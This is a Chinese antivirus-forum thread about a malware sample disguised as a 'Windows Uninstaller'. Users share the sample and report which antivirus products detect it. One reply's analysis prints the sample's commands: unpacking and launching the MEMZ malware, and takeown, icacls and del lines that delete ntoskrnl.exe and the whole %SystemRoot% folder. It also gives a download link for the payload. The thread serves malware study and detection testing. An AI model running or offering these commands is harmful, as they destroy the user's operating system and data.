查看: 3498|回复: 47
收起左侧

[病毒样本] Windows卸载器

[复制链接]
shc0743
发表于 2021-12-25 15:46:55 | 显示全部楼层 |阅读模式
本帖最后由 shc0743 于 2021-12-25 15:58 编辑

密码:infected

解压运行setup.bat

vt14/65

运行后弹出控制面板,多出  Microsoft Windows  项


实体机无法运行





本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ICzcz
发表于 2021-12-25 15:58:39 | 显示全部楼层
本帖最后由 ICzcz 于 2021-12-25 16:03 编辑

ELG分析中:安全
心心相印
发表于 2021-12-25 16:02:46 | 显示全部楼层
md双击阻止运行。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
xiaobao233
发表于 2021-12-25 16:09:36 | 显示全部楼层
火绒miss
aboringman
发表于 2021-12-25 16:25:25 | 显示全部楼层
本帖最后由 aboringman 于 2021-12-25 16:27 编辑

360: 1

  1. 2021-12-25 16:23:28     恶意软件(QVM41.2.709F.Malware.Gen)MD5:085f5d5ba58e60f2cda58bf5830abf2c    已删除此文件,如果您发现误删,可从隔离区恢复此文件。        d:\360极速浏览器下载\test\windowsuninstaller.exe
复制代码




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
anthonyqian
发表于 2021-12-25 16:26:52 | 显示全部楼层
诺顿

文件名: WindowsUninstaller.exe
威胁名称: WS.Reputation.1
11111111111445
发表于 2021-12-25 16:54:20 | 显示全部楼层
avastmiss
Hacker-云
发表于 2021-12-25 16:58:18 | 显示全部楼层
芬安全,卡巴KIS扫描无反应
a27573
发表于 2021-12-25 18:47:26 | 显示全部楼层
本帖最后由 a27573 于 2021-12-25 20:46 编辑

一个MEMZ释放器+删除系统文件



检测虚拟机,如果不是则退出:


  1. 此程序为病毒,请在虚拟机中运行!!
  2. 若无法检测虚拟机环境,请使用VMware
复制代码

确认运行:

  1. 确定卸载 Windows?
复制代码

释放文件:
  1. 7za.exe
  2. MEMZ.7z
复制代码
https://wwi.lanzouy.com/b0172vdaf
密码:f4kl

运行命令/进程:
  1. //解压MEMZ.7z,密码MEMZ
  2. 7za x MEMZ.7z -pMEMZ

  3. //运行MEMZ
  4. cmd /c start "" "geometry dash auto speedhack.exe" /main
  5. "geometry dash auto speedhack.exe" /watchdog

  6. //删除系统文件
  7. takeown /F %SystemRoot%\system32\ntoskrnl.exe
  8. icacls %SystemRoot%\system32\ntoskrnl.exe /grant %username%:F
  9. del /f /s /q %SystemRoot%\system32\ntoskrnl.exe
  10. del /f /s /q %SystemRoot%\
复制代码

确认重启:
  1. 卸载已完成!
  2. 您想现在重新启动以应用更改吗?
复制代码

后面都是重启相关的代码

MEMZ.7z解压后ESET报Win32/Zmem.A
但应该拦不了删除系统文件

这个MEMZ比较老,主要是破坏MBR


顺便吐槽:
大名鼎鼎的MEMZ,还不报的杀软可以钉在耻辱柱上了


这个样本BD和一大票OEM了BD的厂商报FakeAV
估计是因为看不懂中文,对着英文名瞎猜



@Eset小粉絲



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
a27573
发表于 2021-12-25 18:55:49 | 显示全部楼层
本帖最后由 a27573 于 2021-12-25 18:56 编辑
ICzcz 发表于 2021-12-25 15:58
ELG分析中:安全

这都能安全。。。
或者是因为做了反虚拟机检测,反而跑不出行为?
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-20 06:03 , Processed in 0.153730 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表